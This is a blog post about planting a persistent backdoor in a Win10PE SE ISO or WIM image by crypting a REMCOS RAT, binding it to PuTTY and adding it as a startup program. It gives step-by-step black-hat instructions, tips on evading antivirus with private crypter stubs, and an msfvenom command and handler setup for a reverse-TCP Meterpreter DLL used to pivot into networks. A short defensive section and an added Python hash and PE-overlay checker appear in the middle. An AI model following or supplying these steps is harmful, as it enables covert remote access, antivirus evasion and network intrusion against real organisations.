Wednesday, October 12, 2016
Persistent Backdooring Win10PE SE ISO or WIM
My goal was to create a persistent backdoor on a small business or corporate network using a Win10PE SE build, delivered as either an ISO or a WIM file, with a technique within the skill level of any attacker. I chose the REMCOS RAT. REMCOS is a commercial remote administration tool used for both legitimate and malicious purposes; it is often used by black hats, and at only $60.00 a month it is worth the cost. http://breaking-security.net/remcos.php
Anti-analysis features can also prolong the life of your backdoor.
I chose the Octopus crypter/binder to bind the RAT to PuTTY as an example of a trusted program. A crypter obfuscates an executable to evade anti-virus detection; a binder attaches malware to a legitimate program so that running the result launches the legitimate program and the RAT server at the same time. As for crypters, you can use old free ones, or get something modern with a private stub that gives you months without detection.
Note that most REMCOS functions work in the PE environment, notably the file manager and DLL injection. I tested Metasploit's Meterpreter by injecting a DLL payload, meterpreter.dll. Not only did Meterpreter work, it was also possible to pivot from the Windows 10 PE SE live ISO or WIM. The pivot lets the attacker enumerate and exploit machines on any other network connected to the machine running the Windows 10PE SE ISO or WIM.
I also tested Empire and successfully injected a DLL payload, Empire.dll.
An attacker could spread a backdoored Windows 10PE SE ISO or WIM through social engineering, or by using existing access if the attacker is an insider. The backdoor could probably fly under the radar for a while, giving the attacker sporadic access to the network. The attack is probably only useful if the victim frequently boots the backdoored ISO or WIM (which can also be set up to boot over the network via PXE): http://www.howtogeek.com/162070/it-geek-how-to-network-boot-pxe-the-winpe-recovery-disk-with-pxelinux-v5-wimboot/
Effects of a persistent backdoor trojan
1. An attacker can access any drive mounted on the infected computer. Since the installed OS's file permissions do not apply while it is offline under WinPE, this can be used to bind the bot or RAT to programs on a hard drive that holds an installed OS, gaining persistence on that OS, provided the file system is not encrypted.
2. An attacker could load Metasploit's Meterpreter and pivot to attack other machines on the private network.
3. A trojan could go undetected by AV for months if the attacker is willing to buy a private crypter stub; this can be done for as little as $100.00.
What can be done to prevent it
1. Don't trust "free" precompiled ISOs or WIMs of malware-fighting tools from sites that are not well known.
2. Check for untrusted programs under AppsMy when building your ISO or WIM.
3. After building the ISO, scan it for malware with Kaspersky or Bitdefender (a crypted payload may still slip past a scanner, so combine this with point 4).
4. Compare file hashes against the vendor's published values to see whether a tool has been modified by a binder/crypter. Prefer SHA-256 over MD5, which is collision-prone; record the hashes before the build and re-check them afterwards.
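As an added example (not code from the original post), the following Python script implements points 3 and 4 above on the defender's side: it records a SHA-256 manifest of the tool directory before the build, re-verifies it afterwards to flag modified, missing and unexpected files, and, as an extra indicator, measures any data appended past the last PE section (an overlay), which is one common place for a simple binder to stash its bundled payload. The file names, the minimal synthetic PE header and the appended "payload" bytes are constructed for the demo; they are not from the post and the PE is not a real PuTTY binary.

```python
import hashlib
import os
import struct
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 (large ISO/WIM contents should not be read whole)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every relative path under root to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            manifest[os.path.relpath(path, root)] = sha256_file(path)
    return manifest


def verify_manifest(root, manifest):
    """Compare the directory's current state against a previously recorded manifest."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "unexpected": sorted(k for k in current if k not in manifest),
    }


def pe_overlay_size(data):
    """Return the number of bytes appended after the last section's raw data.

    Walks the DOS header -> PE signature -> COFF header -> section table and
    takes max(PointerToRawData + SizeOfRawData) as the end of the PE image.
    Anything beyond that is an overlay; a clean build normally has none.
    """
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    sect_off = pe_off + 24 + opt_size  # signature (4) + COFF header (20) + optional header
    if sect_off + 40 * nsect > len(data):
        raise ValueError("section table runs past end of file")
    end = 0
    for i in range(nsect):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_off + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return max(0, len(data) - end)


def make_fake_pe(section_data, overlay=b""):
    """Build a minimal synthetic PE (one section, no optional header) for the demo.

    This is a constructed stand-in, not a real executable; it only needs to be
    well-formed enough for pe_overlay_size() to parse it.
    """
    pe_off = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    raw_ptr = pe_off + 4 + 20 + 40  # headers end right before the section data
    sect = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(section_data), 0x1000, len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020
    )
    return dos + b"PE\0\0" + coff + sect + section_data + overlay


def demo():
    """Record a manifest, simulate a binder tampering with the tool directory, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        clean = make_fake_pe(b"\x90" * 64)
        with open(os.path.join(root, "putty.exe"), "wb") as f:
            f.write(clean)
        manifest = build_manifest(root)  # taken before the build, from a trusted copy

        tampered = make_fake_pe(b"\x90" * 64, overlay=b"RAT" * 100)  # constructed payload
        with open(os.path.join(root, "putty.exe"), "wb") as f:
            f.write(tampered)
        with open(os.path.join(root, "BadPutty.exe"), "wb") as f:
            f.write(tampered)

        report = verify_manifest(root, manifest)
        report["overlay_bytes"] = pe_overlay_size(tampered)
        report["clean_overlay_bytes"] = pe_overlay_size(clean)
        return report


if __name__ == "__main__":
    print(demo())
```

The hash manifest catches any byte-level change, including a crypter that rebuilds the whole executable around a private stub, so it is the primary check; the overlay measurement is only a cheap secondary signal, since a stub-based crypter need not leave an overlay at all. Where the vendor signs its binaries, an Authenticode signature check is a further, independent test of the same thing.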
Step by step from a black hat's perspective
1. Crypt your RAT and bind it to putty.exe (this example uses Octopus 2.3.2).
2. Check your file for detection with a scanner that does not share samples with AV vendors, such as https://nodistribute.com
3. Create the Windows 10 PE ISO or WIM with WinBuilder.
I used the Windows 10 Enterprise 2015 LTSB evaluation as the source for the ISO or WIM.
WinBuilder download: http://win10se.cwcodes.net/Compressed/
Launch WinBuilder:
a. Under Utils, click PC Packed.
b. Add the backdoored PuTTY to a zip file, BadPutty.zip.
c. Name the backdoored executable inside the zip BadPutty.exe.
d. Click AppsMy.
e. Click 2Prepare.
f. Click BadPutty.
g. Select only Startup, so the program runs when the PE boots.
4. Boot your Win10PE SE ISO or WIM. PuTTY loads automatically at startup and runs both PuTTY and the RAT bound to it.
Creating the DLL payload (Meterpreter.dll) in Kali
Example (x86 reverse TCP Meterpreter, null bytes avoided with shikata_ga_nai, emitted as a DLL):
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.202.133 LPORT=1337 -b "\x00" -e x86/shikata_ga_nai -f dll -o /root/Desktop/Meterpreter.dll
Start the handler before injecting the DLL. Launch Metasploit in Kali:
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.202.133
msf exploit(handler) > set LPORT 1337
msf exploit(handler) > exploit -j
I also created a DLL payload, Empire.dll, and tested it the same way from Kali.
Load the DLL payload into memory with REMCOS's DLL injection function; the injected Meterpreter then connects back to the handler above.
Any feedback would be greatly appreciated.